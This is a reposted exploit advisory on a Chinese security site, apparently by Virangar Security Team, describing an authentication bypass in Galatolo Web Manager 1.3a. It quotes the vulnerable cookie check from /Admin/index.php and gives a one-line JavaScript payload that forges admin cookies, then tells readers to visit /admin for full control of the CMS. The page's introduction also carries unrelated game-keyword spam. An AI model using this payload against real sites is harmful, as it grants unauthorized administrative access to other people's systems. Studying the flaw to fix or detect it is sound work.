• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability ,其中包含弑神1.3a隐藏英雄密码,弑神1.3a,守护10号n楼1.3a攻略,守护10号n楼1.3a地图,弑神1.3a攻略等知识点,遇到此问题的同学们可以参考下
############################################################################################
# #
# ...:::::Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability ::::.... #
############################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
DESCRIPTION:
Galatolo Web Manager, suffers from insecure cookie handling, when a admin login is successfull the script creates
a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
logged in as a legit admin.
---
vuln code in /Admin/index.php:

if (grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "admin" || grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "editor" ){
top();
menu();
echo $wellcome_admin;
foot();
}

---
exploit:
javascript:document.cookie = "gwm_user=admin; path=/"; document.cookie = "gwm_pass=admin; path=/";
-----
now visit /admin and you can get admin access and manage the cms ;)
-------
young iranian h4ck3rz
</div>

您可能想查找下面的文章:

  • Galatolo Web Manager 1.3a
  • Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

相关文章

  • iGaming CMS
  • Safari Quicktime
  • Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)
  • MyBulletinBoard (MyBB)
  • MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
  • Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln
  • FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
  • Sun xVM VirtualBox
  • MS Internet Explorer (FTP Server Response) DoS Exploit
  • IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
    • Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC
    • iGaming CMS
    • Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
    • eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit
    • Maian Music 1.0 Insecure Cookie Handling Vulnerability
    • Joomla Component DT Register Remote SQL injection Vulnerability
    • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
    • PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
    • tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有